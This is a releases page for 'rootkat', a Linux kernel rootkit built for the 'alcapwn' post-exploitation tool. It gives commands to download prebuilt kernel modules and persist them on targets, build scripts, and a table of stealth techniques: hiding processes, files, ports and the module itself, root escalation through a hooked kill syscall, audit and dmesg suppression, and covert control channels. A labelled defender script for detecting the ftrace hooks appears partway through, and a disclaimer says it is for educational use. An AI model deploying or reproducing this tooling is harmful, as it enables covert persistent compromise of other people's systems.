Releases: exec/rootkat
v1.0.0
Pre-built kernel modules
Drop the matching .tar.gz into your alcapwn cache:
```bash
KVER=$(uname -r)
ARCH=$(uname -m)
mkdir -p ~/.alcapwn/rootkat/$KVER
curl -fsSL "https://github.com/exec/rootkat/releases/latest/download/rootkat-ko-${KVER}-${ARCH}.tar.gz" \
  | tar -xz -C ~/.alcapwn/rootkat/$KVER rootkat.ko
```
Or let alcapwn fetch it automatically: `persist <id> rootkat` downloads and caches the right .ko for the target kernel if one is available.
| Asset | Kernel series | Distro |
|---|---|---|
| rootkat-ko-6.8.*-generic-x86_64.tar.gz | 6.8.x | Ubuntu 24.04 LTS |
| rootkat-ko-6.14.*.fc42.x86_64-x86_64.tar.gz | 6.14.x | Fedora 42 |
| rootkat-ko-6.17.*-generic-x86_64.tar.gz | 6.17.x | Ubuntu 25.10 |
| rootkat-ko-7.0.*-generic-x86_64.tar.gz | 7.0.x | Ubuntu 26.04 LTS |
ARM64 builds (drop-in replacement, same cache path logic):
| Asset | Kernel series | Distro |
|---|---|---|
| rootkat-ko-6.8.*-generic-aarch64.tar.gz | 6.8.x | Ubuntu 24.04 LTS / arm64 |
| rootkat-ko-6.17.*-generic-aarch64.tar.gz | 6.17.x | Ubuntu 25.10 / arm64 |
| rootkat-ko-7.0.*-generic-aarch64.tar.gz | 7.0.x | Ubuntu 26.04 LTS / arm64 |
For other kernel versions, see the build instructions.
v0.13 — dmesg self-hide + three-channel control surface
v0.13
14 stealth techniques verified end-to-end on Ubuntu 26.04 / kernel 7.0 and Ubuntu 24.04 LTS / kernel 6.x.
What's new in v0.13
- dmesg / printk self-hide — ftrace hook on `vprintk_emit` drops any log line containing "rootkat" before it reaches the ring buffer. Every consumer (dmesg, /dev/kmsg, journald, netconsole) sees the stripped log.
- Three-channel control surface — kill(2) magic signals, io_uring `IORING_OP_NOP` covert channel, and inbound UDP magic frame all reach the same `magic_actions.c` registry.
- `-fno-optimize-sibling-calls` — compiler-enforced defense against gcc sibling-call optimization defeating the ftrace recursion guard. Fixed soft-lockups on Debian 6.12 and Fedora 6.14 found in cross-distro survey.
- Cross-distro survey infrastructure — `tests/cross-distro-survey/` with PVE qm + cloud-init orchestrator. Verified clean on Ubuntu 24.04 (6.8), Debian 13 (6.12), Fedora 42 (6.14).
Pre-built kernel modules
Pre-built `.ko` files are attached for common kernel versions. Each tarball contains a single `rootkat.ko` built against that exact kernel's headers.
To use with alcapwn:
```bash
mkdir -p ~/.alcapwn/rootkat/6.8.0-111-generic
tar -xzf rootkat-ko-6.8.0-111-generic-x86_64.tar.gz -C ~/.alcapwn/rootkat/6.8.0-111-generic/
```
All techniques (v0.13)
| Feature | Mechanism | CI |
|---|---|---|
| Self-hide from /proc/modules | ftrace → m_show | ✓ both |
| Self-hide from /sys/module/ | ftrace → filldir64 | ✓ both |
| File hide | CO-RE eBPF lsm/file_open | ✓ both |
| Privesc to root | ftrace → __x64_sys_kill | ✓ both |
| Process hide | ftrace → filldir64 | ✓ both |
| TCP port hide (v4+v6, /proc+ss) | tcp4/6_seq_show · inet_sk_diag_fill | ✓ both |
| UDP port hide (v4+v6) | udp4/6_seq_show | ✓ both |
| AF_UNIX socket hide | unix_seq_show · unix_diag sk_diag_fill | ✓ both |
| BPF program self-hide | ftrace → __x64_sys_bpf | ✓ both |
| Audit log suppression | ftrace → audit_log_start | code-only |
| io_uring covert channel | ftrace → io_issue_sqe | ✓ both |
| Netfilter covert channel | nf_register_net_hook (NF_INET_PRE_ROUTING) | ✓ both |
| dmesg / printk self-hide | ftrace → vprintk_emit | ✓ both |
| Rust canary (cross-module) | EXPORT_SYMBOL_GPL stub + weak-link | ✓ 7.0 only |
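As an added defender-side example (not code from the rootkat release or its docs), this script parses the tracefs `enabled_functions` listing and reports any ftrace callback attached to the hook targets the table above names. It assumes tracefs is mounted at /sys/kernel/tracing and that the listing itself is intact; the sample lines and addresses it embeds are constructed.

```python
"""Defender check: report ftrace callbacks on the hook targets named in the table above."""
import re
import sys
from pathlib import Path

# Hook targets taken from the rootkat technique table on this page.
WATCHED = {
    "m_show", "filldir64", "__x64_sys_kill", "tcp4_seq_show", "tcp6_seq_show",
    "inet_sk_diag_fill", "udp4_seq_show", "udp6_seq_show", "unix_seq_show",
    "sk_diag_fill", "__x64_sys_bpf", "audit_log_start", "io_issue_sqe",
    "vprintk_emit",
}

# tracefs enabled_functions: "<symbol> [module] (<callback count>)" followed by
# single-letter flags (I = IPMODIFY, needed by a callback that redirects the
# function rather than just observing it) and an optional "tramp: <addr> (<cb>)" tail.
LINE_RE = re.compile(r"^(?P<sym>\S+)(?:\s+\[\S+\])?\s+\((?P<count>\d+)\)(?P<rest>.*)$")

# Constructed sample in that layout (hypothetical addresses, not a real capture).
SAMPLE = """\
vprintk_emit (1)   I     tramp: 0xffffffffc0a41000 (hypothetical_cb)
filldir64 (1)   I     tramp: 0xffffffffc0a41040 (hypothetical_cb)
schedule (1)
"""

def parse_enabled_functions(text):
    """Map symbol -> {count, ipmodify, tramp} for every parsable line."""
    hooked = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        flags, _, tail = m.group("rest").partition("tramp:")
        hooked[m.group("sym")] = {
            "count": int(m.group("count")),
            "ipmodify": re.search(r"\bI\b", flags) is not None,
            "tramp": tail.split()[0] if tail.split() else None,
        }
    return hooked

def suspicious_hooks(text, watched=WATCHED):
    """Watched symbols that currently carry an ftrace callback, sorted."""
    return sorted(sym for sym in parse_enabled_functions(text) if sym in watched)

if __name__ == "__main__":
    path = Path(sys.argv[1] if len(sys.argv) > 1 else "/sys/kernel/tracing/enabled_functions")
    text = path.read_text() if path.exists() else SAMPLE
    for sym in suspicious_hooks(text):
        print(sym, parse_enabled_functions(text)[sym])
```

A module that also conceals itself from tracefs would not show up here, so an empty result is one signal to correlate with the other detection notes, not proof of a clean kernel.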
Building for other kernels
```bash
# Ubuntu 26.04 / kernel 7.0
./scripts/build.sh
# Ubuntu 24.04 LTS / kernel 6.x
UBUNTU_VERSION=24.04 ./scripts/build.sh
```
See docs/threat-model.md for detection notes on every technique.
Educational use only. Loading rootkat on a system you do not own is illegal in most jurisdictions.